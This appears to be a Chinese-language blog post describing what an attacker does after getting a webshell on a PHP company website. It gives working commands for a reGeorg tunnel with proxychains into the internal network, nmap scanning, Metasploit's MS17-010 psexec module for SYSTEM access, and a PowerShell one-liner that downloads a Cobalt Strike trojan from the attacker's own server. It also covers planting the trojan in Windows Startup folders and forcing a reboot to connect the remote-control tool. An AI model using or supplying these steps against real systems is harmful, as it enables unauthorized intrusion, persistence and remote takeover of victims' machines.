拿到webshell之后的事情

之前搞站都是搞到后台管理員,或者搞到webshell就宣布結束了，，今天終於有機會學習一下后面的操作了。

公司網站為php的站，已經拿到webshell。可以進行菜刀連接。

菜刀虛擬終端

php -m #查看php是否有socket庫，因為reGeory需要用到sockets庫。

如果沒有sockets,則上傳的tunnel.php需要添加dl("php_sockers.dll")

reGeorg + proxychains 代理內網

 reGeorg 本地代理

 
          
            python reGeorgSocksProxy.py -p 8080 -u http://222.252.10.101:8080/tunnel.php 
           
#將http://222.252.10.101:8080代理到本地的8080端口 
           
         

然后復制一個終端，proxychains上場。

注意proxychains的配置信息

vi /etc/proxychains.conf

添加

socket5 127.0.0.1 8080 #端口為上面配置的port

因為reGeorg使用的sockets協議，只支持tcp,所以沒法ping通。

proxychains nmap -sT -Pn 172.168.10.50

看到445端口，就要想到ms17-010呀，你也可以proxychains命令行調用一下Nessus掃一下哈

利用msf獲取system權限

proxychains -q msfconsole #-q 不顯示proxychains的回顯信息

 
          
            #use exploit/windows/smb/ms17_010_psexec 
           
#set rhost 172.168.10.50 
           
#run 
           
#shell 
           
進入命令行 
           
         

powershell下載並運行遠控

可以用cobaltstrike生成對應系統的木馬，將該木馬放在自己已有的服務器上。

直接用powershell將木馬從遠程服務器下載到目標服務器中。 

>powershell $client = new-object System.Net.WebClient;$client.DownloadFile(‘http://自己已有服務器ip/zz.exe’,'c:\zz.exe')

或者如果菜刀的權限比較高，可以直接將木馬傳到開機啟動的路徑下；

 
          
            C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup 
           
#win7的開機啟動路徑 C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp 
           
#win10的開機啟動路徑 #根據服務器windows版本搜索對應的開機啟動文件夾的路徑 
           
         

若菜刀權限比較低，可先用菜刀把馬傳到網站根路徑下，再用msf-shell將木馬復制到開機啟動的路徑下。因為有些遠控馬，必須當前用戶啟動木馬后才有更多的功能，所以，先把遠控馬傳到開機啟動的路徑下面，再msf使目標機器重啟，即可達到目的。。。說的比較啰嗦，但這就是我所理解的，，如果有哪里不對，請您留言告訴我哈。

 msf重啟目標機器//這一步並不一定得操作。。

shutdown -r -t 0 或 reboot

然后，連遠控；；